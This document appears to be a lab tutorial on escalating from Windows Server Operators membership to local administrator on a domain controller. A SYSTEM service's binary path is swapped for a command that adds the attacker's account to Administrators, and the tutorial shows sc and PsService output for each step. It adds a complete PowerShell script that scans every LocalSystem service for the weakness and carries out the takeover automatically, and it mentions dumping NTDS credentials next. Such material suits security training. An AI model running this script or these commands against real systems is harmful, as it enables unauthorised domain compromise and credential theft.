Server Operators is a built-in group whose members can manage Windows servers without being given Domain Admin rights.
Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.
We will abuse the ability to control local services: we take a service that runs as SYSTEM, use our Server Operators rights to reconfigure it, and have it make our user a local administrator.
Scanning the AppReadiness Service
AppReadiness is a service that ships with Windows. Querying its configuration shows an svchost-hosted, demand-start service that runs as LocalSystem, i.e. with SYSTEM privileges:
C:\htb> sc qc AppReadiness
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: AppReadiness
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Windows\System32\svchost.exe -k AppReadiness -p
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : App Readiness
        DEPENDENCIES       :
        **SERVICE_START_NAME : LocalSystem      # LocalSystem is NT AUTHORITY\SYSTEM**
Checking Service Permissions with PsService
We use PsService (Sysinternals) to check which permissions the Server Operators group holds on the service.
PsService works much like the sc utility: it displays service status and configuration and can start, stop, pause, resume and restart services, both locally and on remote hosts. Its security subcommand dumps the service's DACL (sc sdshow prints the same DACL as an SDDL string if PsService is not available).
The output (shown further down) grants BUILTIN\Server Operators full access ("All"). That includes SERVICE_CHANGE_CONFIG and SERVICE_START, the two rights the attack needs: one to change the binary path, the other to make the SCM run it.
Checking Local Admin Group Membership
Before changing anything we confirm that our account is not already a member of the local Administrators group (output further down: only Administrator, Domain Admins and Enterprise Admins are members).
Modifying the Service Binary Path
We change the service's binary path (sc config with its binPath= option) so that, instead of svchost.exe, the service runs a command that adds our current user to the local Administrators group. Because the service starts as LocalSystem, that command executes as SYSTEM.
Starting the Service
Starting the service fails with error 1053, which is expected: cmd.exe does not implement the service control dispatcher, so it never reports back to the Service Control Manager and the SCM times it out. By then the command has already run.
Confirming Local Admin Group Membership
If we check the membership of the Administrators group again, our user (server_adm) is now listed, so the command executed successfully as SYSTEM.
Confirming Local Admin Access on Domain Controller
From here we have full control over the Domain Controller: we could retrieve all credentials from the NTDS database, access other systems and carry out post-exploitation tasks. The service should be set back to its original binary path afterwards; otherwise App Readiness stays broken, which is both noisy and damaging to the host.
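The whole chain above (service DACL check, binary-path swap, start, membership check, restore) as one PowerShell script. This is an added example, not code from the original write-up, and it assumes it runs in a Server Operators session on the DC; the service and user names default to the ones seen on this page (AppReadiness, server_adm). It checks the DACL with sc.exe sdshow (SDDL) rather than PsService, and its first step goes beyond the page's single AppReadiness case by running the same test over every LocalSystem service. S-1-5-32-549 (SDDL alias SO) is the well-known SID of BUILTIN\Server Operators; the script file name in the usage note is hypothetical.

```powershell
# Added example (not from the original write-up). Assumes a Server Operators
# session on the DC; defaults come from the page (AppReadiness, server_adm).
param(
    [string]$ServiceName = 'AppReadiness',
    [string]$UserToAdd   = 'server_adm'
)

# SDDL right tokens that let a principal change a service's binary path:
#   DC = SERVICE_CHANGE_CONFIG, GA/GW = generic all/write (both include it),
#   WD/WO = write DACL / take ownership (grant yourself the rest).
$ReconfigureRights = @('DC', 'GA', 'GW', 'WD', 'WO')
$ServerOperators   = @('SO', 'S-1-5-32-549')   # SDDL alias and well-known SID

function Get-ServiceAce {
    # Parse 'sc sdshow <name>' into one object per ACE of the DACL.
    # ACE form: (type;flags;rights;object_guid;inherit_guid;sid)
    param([string]$Name)
    $sddl = (sc.exe sdshow $Name | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return }
    $dacl = ($sddl -split 'S:')[0]              # drop the SACL part, if any
    foreach ($m in [regex]::Matches($dacl, '\(([^)]+)\)')) {
        $f = $m.Groups[1].Value -split ';'
        [pscustomobject]@{
            Type   = $f[0]
            Rights = @([regex]::Matches($f[2], '..') | ForEach-Object { $_.Value })
            Sid    = $f[5]
        }
    }
}

function Test-ServerOperatorsCanReconfigure {
    # True when an Allow ACE grants Server Operators one of $ReconfigureRights.
    param([string]$Name)
    $hit = Get-ServiceAce -Name $Name | Where-Object {
        $_.Type -eq 'A' -and $_.Sid -in $ServerOperators -and
        @($_.Rights | Where-Object { $_ -in $ReconfigureRights }).Count -gt 0
    }
    return [bool]$hit
}

# 1. Which LocalSystem services can Server Operators reconfigure? The page checks
#    AppReadiness only; this runs the same test over every service.
$candidates = @(Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and (Test-ServerOperatorsCanReconfigure -Name $_.Name) } |
    Select-Object -ExpandProperty Name)
"LocalSystem services reconfigurable by Server Operators: $($candidates -join ', ')"
if ($ServiceName -notin $candidates) {
    throw "Server Operators cannot reconfigure $ServiceName; pick one of the services above"
}

# 2. Record the original binary path so the service can be restored at the end.
$origBinPath = (Get-CimInstance Win32_Service -Filter "Name='$ServiceName'").PathName

# 3. Point the service at a command that adds the user to local Administrators.
#    sc.exe requires the space after 'binPath='.
sc.exe config $ServiceName binPath= "cmd.exe /c net localgroup Administrators $UserToAdd /add"

# 4. Start it. cmd.exe never calls StartServiceCtrlDispatcher, so the SCM times
#    out with error 1053, but the command has already run as SYSTEM by then.
$null = sc.exe start $ServiceName

# 5. Confirm the result, then put the original binary path back.
$members = net localgroup Administrators
$added   = [bool]($members -match "^$([regex]::Escape($UserToAdd))\s*$")
"Added $UserToAdd to local Administrators: $added"
sc.exe config $ServiceName binPath= "$origBinPath"
```

Save it as, say, Invoke-ServerOperatorsSvc.ps1 and run `.\Invoke-ServerOperatorsSvc.ps1 -ServiceName AppReadiness -UserToAdd server_adm`. The DACL test looks for the service-specific DC token (SERVICE_CHANGE_CONFIG), not CC, which in service SDDL means SERVICE_QUERY_CONFIG; PsService's "All" corresponds to the full CCDCLCSWRPWPDTLOCRSDRCWDWO string or GA. Step 5 restores the svchost path because a service left pointing at cmd.exe fails every start and is easy to spot; for services whose PathName already contains embedded quotes, check the value with sc qc after the restore, since Windows PowerShell can mangle quotes when passing them to native executables.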
Retrieving NTLM Password Hashes from the Domain Controller

Output of the PsService permission check (see "Checking Service Permissions with PsService"):
C:\htb> c:\Tools\PsService.exe security AppReadiness

PsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

SERVICE_NAME: AppReadiness
DISPLAY_NAME: App Readiness
        ACCOUNT: LocalSystem
        SECURITY:
        [ALLOW] NT AUTHORITY\SYSTEM
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                Pause/Resume
                Start
                Stop
                User-Defined Control
                Read Permissions
        [ALLOW] BUILTIN\Administrators
                All
        [ALLOW] NT AUTHORITY\INTERACTIVE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        [ALLOW] NT AUTHORITY\SERVICE
                Query status
                Query Config
                Interrogate
                Enumerate Dependents
                User-Defined Control
                Read Permissions
        **[ALLOW] BUILTIN\Server Operators
                All**
Local Administrators membership before the attack (see "Checking Local Admin Group Membership"):
C:\htb> net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.
Starting the service after the binary path was changed (see "Starting the Service"):
C:\htb> sc start AppReadiness

[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
Local Administrators membership after the service start (see "Confirming Local Admin Group Membership"):
C:\htb> net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
server_adm
The command completed successfully.